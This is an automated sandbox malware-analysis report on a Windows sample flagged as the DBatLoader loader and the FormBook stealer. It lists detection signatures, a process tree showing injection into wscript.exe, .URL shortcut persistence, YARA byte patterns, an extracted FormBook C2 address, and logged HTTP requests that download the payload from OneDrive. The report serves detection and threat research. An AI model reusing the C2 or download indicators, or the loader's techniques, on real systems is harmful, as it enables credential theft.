Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Overview

General Information

Sample Name:	SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe
Analysis ID:	755939
MD5:	f536ea8fb5b6586bb2ffc764cd52abff
SHA1:	313804060f2511b8382d369a3949d5524c1adaef
SHA256:	e539f80082f961c600e6ff2a21e969d0641aa787831259d3fdd772b28d469721
Tags:	exe
Infos:

Detection

DBatLoader, FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Yara detected DBatLoader

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Writes to foreign memory regions

Machine Learning detection for sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

WScript reads language and country specific registry keys (likely country aware script)

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Found large amount of non-executed APIs

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe (PID: 6024 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe MD5: F536EA8FB5B6586BB2FFC764CD52ABFF)

wscript.exe (PID: 5988 cmdline: C:\Windows\System32\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

Iuigzwjd.exe (PID: 3208 cmdline: "C:\Users\Public\Libraries\Iuigzwjd.exe" MD5: F536EA8FB5B6586BB2FFC764CD52ABFF)

wscript.exe (PID: 1264 cmdline: C:\Windows\System32\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)

Iuigzwjd.exe (PID: 1848 cmdline: "C:\Users\Public\Libraries\Iuigzwjd.exe" MD5: F536EA8FB5B6586BB2FFC764CD52ABFF)

wscript.exe (PID: 5044 cmdline: C:\Windows\System32\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.brainbookgroup.com/nvp4/"]}

Threatname: DBatLoader

{"Download Url": "https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21850&authkey=AEcOcvbyHqeCMT0"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Libraries\djwzgiuI.url	Methodology_Shortcut_HotKey	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x58:$hotkey: \x0AHotKey=7 0x0:$url_explicit: [InternetShortcut]
C:\Users\Public\Libraries\djwzgiuI.url	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x14:$file: URL= 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7d58:$a1: 3C 30 50 4F 53 54 74 09 40 0x20787:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xc026:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1954e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1934c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x18df8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1944e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x195c6:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xbbf1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x18043:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1f4fe:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x204f1:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1b820:$sqlite3step: 68 34 1C 7B E1 0x1c398:$sqlite3step: 68 34 1C 7B E1 0x1b862:$sqlite3text: 68 38 2A 90 C5 0x1c3dd:$sqlite3text: 68 38 2A 90 C5 0x1b879:$sqlite3blob: 68 53 D8 7F 8C 0x1c3f3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6621:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f050:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa8ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17e17:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17c15:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x176c1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17d17:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e8f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa4ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1690c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddc7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1edba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0e9:$sqlite3step: 68 34 1C 7B E1 0x1ac61:$sqlite3step: 68 34 1C 7B E1 0x1a12b:$sqlite3text: 68 38 2A 90 C5 0x1aca6:$sqlite3text: 68 38 2A 90 C5 0x1a142:$sqlite3blob: 68 53 D8 7F 8C 0x1acbc:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.278011909.0000000002520000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000000.00000002.278530431.0000000002A2E000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
Process Memory Space: wscript.exe PID: 5988	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x41bd8:$a1: 3C 30 50 4F 53 54 74 09 40 0xd9da7:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe.2720000.2.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0.2.SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe.2a2eed8.3.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
1.2.wscript.exe.10410000.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.wscript.exe.10410000.3.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7d58:$a1: 3C 30 50 4F 53 54 74 09 40 0x20787:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xc026:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1954e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
1.2.wscript.exe.10410000.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1934c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x18df8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1944e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x195c6:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xbbf1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x18043:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1f4fe:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x204f1:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.wscript.exe.10410000.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1b820:$sqlite3step: 68 34 1C 7B E1 0x1c398:$sqlite3step: 68 34 1C 7B E1 0x1b862:$sqlite3text: 68 38 2A 90 C5 0x1c3dd:$sqlite3text: 68 38 2A 90 C5 0x1b879:$sqlite3blob: 68 53 D8 7F 8C 0x1c3f3:$sqlite3blob: 68 53 D8 7F 8C
1.2.wscript.exe.10410000.3.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.wscript.exe.10410000.3.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6f58:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f987:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb226:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1874e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
1.2.wscript.exe.10410000.3.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1854c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17ff8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1864e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x187c6:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xadf1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x17243:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1e6fe:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1f6f1:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.wscript.exe.10410000.3.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1aa20:$sqlite3step: 68 34 1C 7B E1 0x1b598:$sqlite3step: 68 34 1C 7B E1 0x1aa62:$sqlite3text: 68 38 2A 90 C5 0x1b5dd:$sqlite3text: 68 38 2A 90 C5 0x1aa79:$sqlite3blob: 68 53 D8 7F 8C 0x1b5f3:$sqlite3blob: 68 53 D8 7F 8C
0.2.SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe.2a2eed8.3.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
Click to see the 6 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	ReversingLabs: Detection: 15%
Source: SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Virustotal: Detection: 30%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.wscript.exe.10410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.10410000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\Public\Libraries\Iuigzwjd.exe

Avira: detection malicious, Label: HEUR/AGEN.1214697

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Iuigzwjd.exe

ReversingLabs: Detection: 15%

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Iuigzwjd.exe

Joe Sandbox ML: detected

Source: 0.2.SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe.2581218.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe.2720000.2.unpack	Avira: Label: TR/Hijacker.Gen
Source: 0.2.SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe.2a2eed8.3.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Malware Configuration Extractor: DBatLoader {"Download Url": "https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21850&authkey=AEcOcvbyHqeCMT0"}
Source: 00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.brainbookgroup.com/nvp4/"]}

Source: SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49695 version: TLS 1.2

Source:	Binary string: explorer.pdbUGP source: wscript.exe, 00000001.00000002.572034695.0000000005D50000.00000040.00000001.00040000.00000000.sdmp
Source:	Binary string: wscript.pdbGCTL source: explorer.exe, 00000002.00000002.591545525.0000000015563000.00000004.00000001.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: wscript.exe, 00000001.00000003.277522589.0000000004D22000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.279077303.0000000004EBD000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wscript.exe, wscript.exe, 00000001.00000003.277522589.0000000004D22000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.279077303.0000000004EBD000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wscript.pdb source: explorer.exe, 00000002.00000002.591545525.0000000015563000.00000004.00000001.00040000.00000000.sdmp
Source:	Binary string: explorer.pdb source: wscript.exe, 00000001.00000002.572034695.0000000005D50000.00000040.00000001.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Code function: 0_2_02725B48 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_02725B48

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: www.brainbookgroup.com/nvp4/
Source: Malware configuration extractor	URLs: https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21850&authkey=AEcOcvbyHqeCMT0

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 13.107.43.12 13.107.43.12

Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694

Source: explorer.exe, 00000002.00000000.328190890.000000000F270000.00000004.00000001.00020000.00000000.sdmp

String found in binary or memory: http://www.autoitscript.com/autoit3/J

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Code function: 0_2_02738CBC InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_02738CBC

Source: global traffic	HTTP traffic detected: GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21850&authkey=AEcOcvbyHqeCMT0 HTTP/1.1User-Agent: 70Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /y4mJr27PXKP1w7VmweyBhr9jXuXcCKUmjp-l0AjYgYvmFILscr-gs1ZCYQgPakl85NdXiyluyI2K__n-DTHXtIuKBfix9QJgWA8xZXLmTFKCzO-QrrlJfjFNlxYKvj4CV1InzMNLAsu2pDihkqbVzbigQu3lZ2fbCWy9RogAq5NxzuJ1VRoowitd9q4QmyU6H1eR5JdbJA1JsNbjwDPqFHy3g/Iuigzwjduoa?download&psid=1 HTTP/1.1User-Agent: 70Host: oyuurg.ph.files.1drv.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49695 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.wscript.exe.10410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wscript.exe.10410000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.wscript.exe.10410000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.wscript.exe.10410000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.wscript.exe.10410000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.wscript.exe.10410000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.wscript.exe.10410000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.wscript.exe.10410000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: wscript.exe PID: 5988, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 1.2.wscript.exe.10410000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.wscript.exe.10410000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.wscript.exe.10410000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.wscript.exe.10410000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.wscript.exe.10410000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.wscript.exe.10410000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.576405249.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.564946662.0000000004830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: wscript.exe PID: 5988, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\Public\Libraries\djwzgiuI.url, type: DROPPED	Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
Source: C:\Users\Public\Libraries\djwzgiuI.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_027220F4	0_2_027220F4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05972581	1_2_05972581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0595D5E0	1_2_0595D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A125DD	1_2_05A125DD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A12D07	1_2_05A12D07
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05940D20	1_2_05940D20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A11D55	1_2_05A11D55
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0595841F	1_2_0595841F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A0D466	1_2_05A0D466
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A11FF1	1_2_05A11FF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A1DFCE	1_2_05A1DFCE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A12EF7	1_2_05A12EF7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05966E30	1_2_05966E30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A0D616	1_2_05A0D616
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0594F900	1_2_0594F900
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05964120	1_2_05964120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0595B090	1_2_0595B090
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A120A8	1_2_05A120A8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059720A0	1_2_059720A0
